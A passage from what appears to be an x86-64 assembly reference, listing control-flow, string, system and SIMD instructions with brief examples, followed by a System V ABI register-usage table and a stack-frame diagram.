JGE	Jump if greater/equal	`jge label`
JLE	Jump if less/equal	`jle label`
JA	Jump if above (unsigned)	`ja label`
JB	Jump if below (unsigned)	`jb label`
CALL	Call procedure	`call func`
RET	Return	`ret`
LOOP	Loop with RCX	`loop label`

String Operations

Instruction	Description	Example
MOVS	Move string	`movsb`
CMPS	Compare string	`cmpsb`
SCAS	Scan string	`scasb`
STOS	Store string	`stosb`
LODS	Load string	`lodsb`
REP	Repeat prefix	`rep movsb`

System Instructions

Instruction	Description	Example
SYSCALL	Fast system call	`syscall`
SYSRET	Return from syscall	`sysret`
INT	Software interrupt	`int 0x80`
IRET	Return from interrupt	`iret`
HLT	Halt processor	`hlt`
RDMSR	Read model-specific register	`rdmsr`
WRMSR	Write model-specific register	`wrmsr`
CPUID	Processor identification	`cpuid`
RDTSC	Read timestamp counter	`rdtsc`

SIMD Instructions

Instruction	Description	Example
MOVAPS	Move aligned packed single	`movaps xmm0, xmm1`
MOVUPS	Move unaligned packed single	`movups xmm0, [mem]`
ADDPS	Add packed single	`addps xmm0, xmm1`
SUBPS	Subtract packed single	`subps xmm0, xmm1`
MULPS	Multiply packed single	`mulps xmm0, xmm1`
DIVPS	Divide packed single	`divps xmm0, xmm1`
SQRTPS	Square root packed single	`sqrtps xmm0, xmm1`
ANDPS	Bitwise AND of packed single	`andps xmm0, xmm1`
ORPS	Bitwise OR	`orps xmm0, xmm1`
XORPS	Bitwise XOR	`xorps xmm0, xmm1`

Appendix B: System V ABI Reference

Register Usage

rax:      Return value, scratch
rbx:      Callee-saved
rcx:      Scratch (argument 4)
rdx:      Scratch (argument 3, return high)
rsi:      Scratch (argument 2)
rdi:      Scratch (argument 1)
rbp:      Callee-saved (frame pointer)
rsp:      Stack pointer
r8:       Scratch (argument 5)
r9:       Scratch (argument 6)
r10-r11:  Scratch
r12-r15:  Callee-saved
xmm0-1:   Return value, arguments
xmm2-7:   Arguments
xmm8-15:  Scratch (caller-saved)

Stack Frame

High addresses
+-----------------+
| Caller's frame  |
+-----------------+ <-- 16-byte aligned
| Return address  |
+-----------------+ <-- rbp+8
| Saved rbp       |
+-----------------+ <-- rbp
| Local vars      |
| (alignment)     |
+-----------------+ <-- rsp
Low addresses

Appendix C: Windows x64 ABI Reference